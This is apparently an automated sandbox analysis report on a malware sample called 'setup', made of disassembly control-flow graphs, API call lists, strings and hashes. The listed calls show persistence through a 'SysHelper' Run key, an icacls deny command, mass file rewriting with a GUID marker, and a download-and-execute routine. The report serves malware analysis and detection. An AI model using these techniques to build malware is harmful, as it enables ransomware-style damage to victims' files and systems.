                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1963 40e670-40e697 call 420c62 * 2 1968 40e6b4-40e6c2 GetAdaptersInfo 1963->1968 1969 40e699-40e6b3 call 421f2d call 420bed 1963->1969 1970 40e6c4-40e6d9 call 420bed call 420c62 1968->1970 1971 40e6db-40e6e8 GetAdaptersInfo 1968->1971 1970->1969 1970->1971 1974 40e744-40e754 call 420bed 1971->1974 1975 40e6ea-40e73c call 4204a6 call 421f2d * 2 1971->1975 1989 40e741 1975->1989 1989->1974
                APIs
                • _malloc.LIBCMT ref: 0040E67F
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040E68B
                • _wprintf.LIBCMT ref: 0040E69E
                • _free.LIBCMT ref: 0040E6A4
                  • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                • _free.LIBCMT ref: 0040E6C5
                • _malloc.LIBCMT ref: 0040E6CD
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                • _sprintf.LIBCMT ref: 0040E720
                • _wprintf.LIBCMT ref: 0040E732
                • _wprintf.LIBCMT ref: 0040E73C
                • _free.LIBCMT ref: 0040E745
                Strings
                • Address: %s, mac: %s, xrefs: 0040E72D
                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                • API String ID: 3901070236-1604013687
                • Opcode ID: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                • Opcode Fuzzy Hash: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2367 40fb98-40fb9f 2368 40fba0-40fbb9 2367->2368 2368->2368 2369 40fbbb-40fbcf 2368->2369 2370 40fbd1 2369->2370 2371 40fbd3-40fc02 PathAppendW call 418400 2369->2371 2370->2371 2374 40fc04-40fc0c call 422587 2371->2374 2375 40fc0f-40fc29 2371->2375 2374->2375 2377 40fc49-40fc4c 2375->2377 2378 40fc2b-40fc2f 2375->2378 2379 40fc4f-40fc6b PathFileExistsW 2377->2379 2378->2379 2381 40fc31-40fc47 call 4205a0 2378->2381 2382 40fc6d-40fc86 call 420c62 2379->2382 2383 40fcdf-40fce5 2379->2383 2381->2379 2394 40fc88 2382->2394 2395 40fc8a-40fc9f lstrcpyW 2382->2395 2386 40fcf0-40fd07 call 417140 2383->2386 2387 40fce7-40fced call 422587 2383->2387 2396 40fd09 2386->2396 2397 40fd0b-40fd20 FindFirstFileW 2386->2397 2387->2386 2394->2395 2398 40fca1 2395->2398 2399 40fca3-40fcdc lstrcatW call 414690 call 40f0e0 call 420bed 2395->2399 2396->2397 2400 40fd30-40fd4c 2397->2400 2401 40fd22-40fd2d call 422587 2397->2401 2398->2399 2399->2383 2405 40fd52-40fd55 2400->2405 2406 410072-410076 2400->2406 2401->2400 2411 40fd60-40fd6b 2405->2411 2407 410086-4100a4 2406->2407 2408 410078-410083 call 422587 2406->2408 2413 4100b1-4100c9 2407->2413 2414 4100a6-4100ae call 422587 2407->2414 2408->2407 2416 40fd70-40fd76 2411->2416 2422 4100d6-4100ee 2413->2422 2423 4100cb-4100d3 call 422587 2413->2423 2414->2413 2417 40fd96-40fd98 2416->2417 2418 40fd78-40fd7b 2416->2418 2428 40fd9b-40fd9d 2417->2428 2425 40fd92-40fd94 2418->2425 2426 40fd7d-40fd85 2418->2426 2433 4100f0-4100f8 call 422587 2422->2433 2434 4100fb-41010b 2422->2434 2423->2422 2425->2428 2426->2417 2432 40fd87-40fd90 2426->2432 2435 410052-410065 FindNextFileW 2428->2435 2436 40fda3-40fdae 2428->2436 2432->2416 2432->2425 2433->2434 2435->2411 2438 41006b-41006c FindClose 2435->2438 2439 40fdb0-40fdb6 2436->2439 2438->2406 2441 40fdd6-40fdd8 2439->2441 2442 40fdb8-40fdbb 2439->2442 2445 40fddb-40fddd 2441->2445 2443 40fdd2-40fdd4 2442->2443 2444 40fdbd-40fdc5 2442->2444 2443->2445 2444->2441 2446 40fdc7-40fdd0 2444->2446 2445->2435 2447 40fde3-40fdea 2445->2447 2446->2439 2446->2443 2448 40fdf0-40fe71 call 417140 call 415ae0 call 414690 call 413b70 2447->2448 2449 40fec2-40fecc 2447->2449 2471 40fe81-40fea9 2448->2471 2472 40fe73-40fe7e call 422587 2448->2472 2451 40feda-40fede 2449->2451 2452 40fece-40fed5 call 411ab0 2449->2452 2451->2435 2455 40fee4-40ff13 call 414690 2451->2455 2452->2451 2461 40ff15-40ff17 2455->2461 2462 40ff19-40ff1f 2455->2462 2464 40ff31-40ff6a call 415ae0 PathFindExtensionW 2461->2464 2465 40ff22-40ff2b 2462->2465 2473 40ff9a-40ffa8 2464->2473 2474 40ff6c 2464->2474 2465->2465 2467 40ff2d-40ff2f 2465->2467 2467->2464 2471->2435 2478 40feaf-40febd call 422587 2471->2478 2472->2471 2476 40ffda-40ffde 2473->2476 2477 40ffaa 2473->2477 2479 40ff70-40ff74 2474->2479 2480 40ffe0-40ffe9 2476->2480 2481 41003a-410042 2476->2481 2483 40ffb0-40ffb4 2477->2483 2478->2435 2485 40ff76-40ff78 2479->2485 2486 40ff7a 2479->2486 2490 40ffeb 2480->2490 2491 40ffed-40fff9 call 421c02 2480->2491 2487 410044-41004c call 422587 2481->2487 2488 41004f 2481->2488 2492 40ffb6-40ffb8 2483->2492 2493 40ffba 2483->2493 2489 40ff7c-40ff88 call 421c02 2485->2489 2486->2489 2487->2488 2488->2435 2503 40ff93 2489->2503 2504 40ff8a-40ff8f 2489->2504 2490->2491 2491->2481 2505 40fffb-41000b 2491->2505 2498 40ffbc-40ffce call 421c02 2492->2498 2493->2498 2498->2481 2507 40ffd0-40ffd5 2498->2507 2509 40ff97 2503->2509 2504->2479 2508 40ff91 2504->2508 2510 41000d 2505->2510 2511 41000f-410026 call 421c02 2505->2511 2507->2483 2512 40ffd7 2507->2512 2508->2509 2509->2473 2510->2511 2511->2481 2515 410028-410035 call 4111c0 2511->2515 2512->2476 2515->2481
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                • String ID:
                • API String ID: 3232302685-0
                • Opcode ID: 19726536d61e2c547f0d943dc03bf4c213046569c0fbc079e5343f8099df6f48
                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                • Opcode Fuzzy Hash: 19726536d61e2c547f0d943dc03bf4c213046569c0fbc079e5343f8099df6f48
                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 985 411cd0-411d1a call 42f7c0 RegOpenKeyExW 988 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 985->988 989 412207-412216 985->989 992 411d93-411d9c 988->992 993 411d8f-411d91 988->993 995 411da0-411da9 992->995 994 411daf-411dcb call 415c10 993->994 999 411dd1-411df8 lstrlenA call 413520 994->999 1000 411e7c-411e87 994->1000 995->995 996 411dab-411dad 995->996 996->994 1007 411e28-411e2c 999->1007 1008 411dfa-411dfe 999->1008 1002 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 411e89-411e91 call 422587 1000->1003 1012 411f36-411f38 1002->1012 1013 411f3a-411f3f 1002->1013 1003->1002 1010 411e3c-411e50 PathFileExistsW 1007->1010 1011 411e2e-411e39 call 422587 1007->1011 1014 411e00-411e08 call 422587 1008->1014 1015 411e0b-411e23 call 4145a0 1008->1015 1010->1000 1019 411e52-411e57 1010->1019 1011->1010 1017 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1012->1017 1018 411f40-411f49 1013->1018 1014->1015 1015->1007 1032 411f98-411fa0 1017->1032 1033 411fce-411fe9 1017->1033 1018->1018 1023 411f4b-411f4d 1018->1023 1024 411e59-411e5e 1019->1024 1025 411e6a-411e6e 1019->1025 1023->1017 1024->1025 1028 411e60-411e65 call 414690 1024->1028 1025->989 1030 411e74-411e77 1025->1030 1028->1025 1034 4121ff-412204 call 422587 1030->1034 1037 411fa2-411fa4 1032->1037 1038 411fa6-411faf 1032->1038 1035 411feb-411fed 1033->1035 1036 411fef-411ff8 1033->1036 1034->989 1040 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1035->1040 1041 412000-412009 1036->1041 1042 411fbf-411fc9 call 415c10 1037->1042 1044 411fb0-411fb9 1038->1044 1050 4121d1-4121d5 1040->1050 1051 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1051 1041->1041 1045 41200b-41200d 1041->1045 1042->1033 1044->1044 1047 411fbb-411fbd 1044->1047 1045->1040 1047->1042 1052 4121e2-4121fa 1050->1052 1053 4121d7-4121df call 422587 1050->1053 1059 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 412109-412110 call 413260 1051->1060 1052->989 1056 4121fc 1052->1056 1053->1052 1056->1034 1064 4121b2-4121b8 1059->1064 1065 4121aa-4121b0 GetLastError 1059->1065 1060->1059 1066 4121c0-4121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                • _memset.LIBCMT ref: 00411D3B
                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                • GetCommandLineW.KERNEL32 ref: 00411EB4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                • UuidCreate.RPCRT4(?), ref: 00411EFC
                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                • DeleteFileW.KERNEL32(?), ref: 00412036
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                • _memset.LIBCMT ref: 00412090
                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                • lstrlenW.KERNEL32(?), ref: 004120D7
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                • _memset.LIBCMT ref: 00412120
                • SetLastError.KERNEL32(00000000), ref: 00412146
                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                • API String ID: 2589766509-1182136429
                • Opcode ID: 4e4c5458700c2d91c1caac65c9a4d10db194b09c72ae55d3a0619c707741ebf1
                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                • Opcode Fuzzy Hash: 4e4c5458700c2d91c1caac65c9a4d10db194b09c72ae55d3a0619c707741ebf1
                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1067 4111c0-41121d CreateFileW 1068 411223-411232 GetFileSizeEx 1067->1068 1069 4118eb-4118fb 1067->1069 1070 4112a3-4112be VirtualAlloc 1068->1070 1071 411234 1068->1071 1074 4112c0-4112d5 call 42b420 1070->1074 1075 41131a-411331 CloseHandle 1070->1075 1072 411236-41123a 1071->1072 1073 41123c-411281 CloseHandle call 413100 call 4159d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 411287-4112a2 call 422587 1073->1091 1081 4113b1 1074->1081 1082 4112db-4112de 1074->1082 1085 4113b7-4113ef SetFilePointer 1081->1085 1083 4112e0-4112e3 1082->1083 1084 4112e9-41130a SetFilePointerEx 1082->1084 1083->1081 1083->1084 1087 411332-41134d ReadFile 1084->1087 1088 41130c-411314 VirtualFree 1084->1088 1089 4113f5-41140d ReadFile 1085->1089 1090 4115bf 1085->1090 1087->1088 1092 41134f-411354 1087->1092 1088->1075 1093 411440-411445 1089->1093 1094 41140f-41143f VirtualFree CloseHandle call 412d50 1089->1094 1095 4115c5-4115d9 SetFilePointerEx 1090->1095 1092->1088 1097 411356-411359 1092->1097 1093->1090 1099 41144b-41146b 1093->1099 1095->1094 1100 4115df-4115eb 1095->1100 1097->1085 1102 41135b-411377 call 412c40 call 417060 1097->1102 1104 411471-4115a8 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40c5c0 call 412d10 call 412d50 call 40bbd0 call 40bd50 call 413ff0 call 412f70 call 40c070 SetFilePointer 1099->1104 1105 411718-4117d9 lstrlenA call 420be4 lstrlenA call 42d8d0 lstrlenA call 40eaa0 call 422110 call 40bbd0 call 40bd50 call 412f70 call 40c070 1099->1105 1106 4115ed-4115fc WriteFile 1100->1106 1107 41160e-411643 call 4130b0 call 412840 1100->1107 1130 4113a7-4113af call 412d50 1102->1130 1131 411379-4113a6 VirtualFree CloseHandle call 412d50 1102->1131 1182 4117e1-41182e call 412d50 call 412c40 call 412bf0 call 40cba0 1104->1182 1195 4115ae-4115ba call 412d50 * 2 1104->1195 1105->1182 1106->1094 1111 411602-41160b call 422110 1106->1111 1127 411645 1107->1127 1128 411647-41165a WriteFile call 412d50 1107->1128 1111->1107 1127->1128 1128->1094 1144 411660-411680 lstrlenA WriteFile 1128->1144 1130->1085 1144->1094 1147 411686-4116de CloseHandle call 413100 call 4159d0 MoveFileW 1144->1147 1163 4116e4-411717 VirtualFree call 413210 call 412d50 1147->1163 1164 4118a7-4118d3 call 413210 call 412d50 1147->1164 1184 4118e3-4118e6 1164->1184 1185 4118d5-4118dd VirtualFree 1164->1185 1203 411830-411832 1182->1203 1204 41186e-4118a6 VirtualFree CloseHandle call 412d50 * 2 1182->1204 1184->1069 1186 4118e8-4118e9 CloseHandle 1184->1186 1185->1184 1186->1069 1195->1090 1203->1204 1205 411834-41185b WriteFile 1203->1205 1205->1204 1207 41185d-411869 call 412d50 1205->1207 1207->1095
                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                • MoveFileW.KERNEL32(00000000,?), ref: 00411277
                • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
                • _memset.LIBCMT ref: 004112C8
                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
                • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
                • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
                • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
                • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
                • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
                • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
                • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
                • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
                • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
                • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
                • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
                • MoveFileW.KERNEL32(?,?), ref: 004116D6
                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                • API String ID: 254274740-1186676987
                • Opcode ID: 9aa746252a9644b602ff3828f29090a0bf6b29fcabf3e0acc66461a8c08dfb65
                • Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
                • Opcode Fuzzy Hash: 9aa746252a9644b602ff3828f29090a0bf6b29fcabf3e0acc66461a8c08dfb65
                • Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1412 41dbd0-41dcea call 42f7c0 call 413ff0 call 4156d0 call 413ff0 call 40ecb0 1423 41dcf0-41dd82 LoadLibraryW GetProcAddress call 413c40 UuidCreate UuidToStringA 1412->1423 1424 41e459-41e45f 1412->1424 1441 41dd84-41dd86 1423->1441 1442 41dd88-41dd8d 1423->1442 1425 41e461-41e465 1424->1425 1426 41e498-41e4a0 1424->1426 1428 41e467-41e46b 1425->1428 1429 41e48f-41e495 call 422587 1425->1429 1430 41e4b1-41e4c7 1426->1430 1431 41e4a2-41e4ae call 422587 1426->1431 1433 41e477-41e48d 1428->1433 1434 41e46d-41e474 call 422587 1428->1434 1429->1426 1431->1430 1433->1428 1433->1429 1434->1433 1444 41dd99-41de83 call 4156d0 RpcStringFreeA PathAppendA CreateDirectoryA call 4184e0 call 413ff0 call 412900 call 413580 1441->1444 1445 41dd90-41dd95 1442->1445 1457 41de85-41de91 call 422587 1444->1457 1458 41de94-41de99 1444->1458 1445->1445 1446 41dd97 1445->1446 1446->1444 1457->1458 1460 41e3da-41e3e2 1458->1460 1461 41de9f-41dea3 1458->1461 1463 41e3f3-41e419 1460->1463 1464 41e3e4-41e3f0 call 422587 1460->1464 1465 41dea7-41debc call 414300 1461->1465 1467 41e41b-41e427 call 422587 1463->1467 1468 41e42a-41e44a 1463->1468 1464->1463 1476 41ded0-41df5a call 42b420 InternetOpenA call 413ff0 call 412900 call 421c02 1465->1476 1477 41debe-41dec2 1465->1477 1467->1468 1473 41e455 1468->1473 1474 41e44c-41e452 call 422587 1468->1474 1473->1424 1474->1473 1491 41e031-41e075 call 414690 call 412840 1476->1491 1492 41df60-41df9c call 414690 call 40dd40 1476->1492 1479 41dec4-41dec6 1477->1479 1480 41dec8 1477->1480 1483 41deca-41dece 1479->1483 1480->1483 1483->1476 1501 41e077 1491->1501 1502 41e079-41e08b InternetOpenUrlA 1491->1502 1503 41e014-41e01c 1492->1503 1504 41df9e-41dfa3 1492->1504 1501->1502 1505 41e08d-41e099 call 422587 1502->1505 1506 41e09c-41e0bc 1502->1506 1507 41e02d 1503->1507 1508 41e01e-41e02a call 422587 1503->1508 1509 41dfb1-41dfcc 1504->1509 1510 41dfa5-41dfae call 422587 1504->1510 1505->1506 1514 41e0e2-41e11b HttpQueryInfoW 1506->1514 1515 41e0be-41e0cb 1506->1515 1507->1491 1508->1507 1511 41dfe7-41dfed 1509->1511 1512 41dfce-41dfd2 1509->1512 1510->1509 1518 41dff3-41e011 1511->1518 1512->1518 1519 41dfd4-41dfe5 call 4205a0 1512->1519 1514->1515 1524 41e11d-41e15f call 413ff0 call 41e5b0 1514->1524 1521 41e0d1-41e0dd call 422587 1515->1521 1522 41e3c2-41e3cd 1515->1522 1518->1503 1519->1518 1521->1522 1522->1465 1526 41e3d3 1522->1526 1535 41e161-41e16f 1524->1535 1536 41e174-41e19f call 41e5b0 call 413010 1524->1536 1526->1460 1535->1536 1541 41e1a1-41e1a6 1536->1541 1542 41e1d3-41e1db 1536->1542 1543 41e1b4-41e1ce call 413d40 1541->1543 1544 41e1a8-41e1b1 call 422587 1541->1544 1545 41e1dd-41e1e9 call 422587 1542->1545 1546 41e1ec-41e248 lstrcpyA PathAppendA 1542->1546 1543->1542 1544->1543 1545->1546 1547 41e24a-41e24c 1546->1547 1548 41e24e-41e250 1546->1548 1552 41e25c-41e293 call 4156d0 CreateFileA 1547->1552 1553 41e253-41e258 1548->1553 1559 41e353-41e358 1552->1559 1560 41e299-41e2a9 SetFilePointer 1552->1560 1553->1553 1556 41e25a 1553->1556 1556->1552 1561 41e366-41e380 1559->1561 1562 41e35a-41e363 call 422587 1559->1562 1560->1559 1563 41e2af 1560->1563 1565 41e382-41e38b call 422587 1561->1565 1566 41e38e-41e3b0 1561->1566 1562->1561 1567 41e2b1-41e2cf InternetReadFile 1563->1567 1565->1566 1572 41e3b2-41e3bb call 422587 1566->1572 1573 41e3be 1566->1573 1570 41e2d1-41e2da 1567->1570 1571 41e314 1567->1571 1570->1571 1576 41e2dc-41e303 WriteFile 1570->1576 1574 41e316-41e32e CloseHandle InternetCloseHandle * 2 1571->1574 1572->1573 1573->1522 1574->1559 1578 41e330-41e332 1574->1578 1576->1574 1579 41e305-41e310 1576->1579 1578->1559 1581 41e334-41e34d ShellExecuteA 1578->1581 1579->1567 1582 41e312 1579->1582 1581->1559 1582->1574
                APIs
                  • Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66
                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01
                  • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                • UuidCreate.RPCRT4(?), ref: 0041DD3C
                • UuidToStringA.RPCRT4(?,?), ref: 0041DD57
                • RpcStringFreeA.RPCRT4(00000000), ref: 0041DDB4
                • PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
                • CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
                • _memset.LIBCMT ref: 0041DEE7
                • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC
                  • Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                • _wcsstr.LIBCMT ref: 0041DF50
                • InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B
                  • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
                  • Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
                  • Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
                  • Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
                  • Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7
                • _memmove.LIBCMT ref: 0041DFDD
                • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
                • lstrcpyA.KERNEL32(?,?), ref: 0041E229
                • PathAppendA.SHLWAPI(?,?), ref: 0041E23F
                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
                • CloseHandle.KERNEL32(00000000), ref: 0041E317
                • InternetCloseHandle.WININET(00000000), ref: 0041E324
                • InternetCloseHandle.WININET(?), ref: 0041E32A
                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
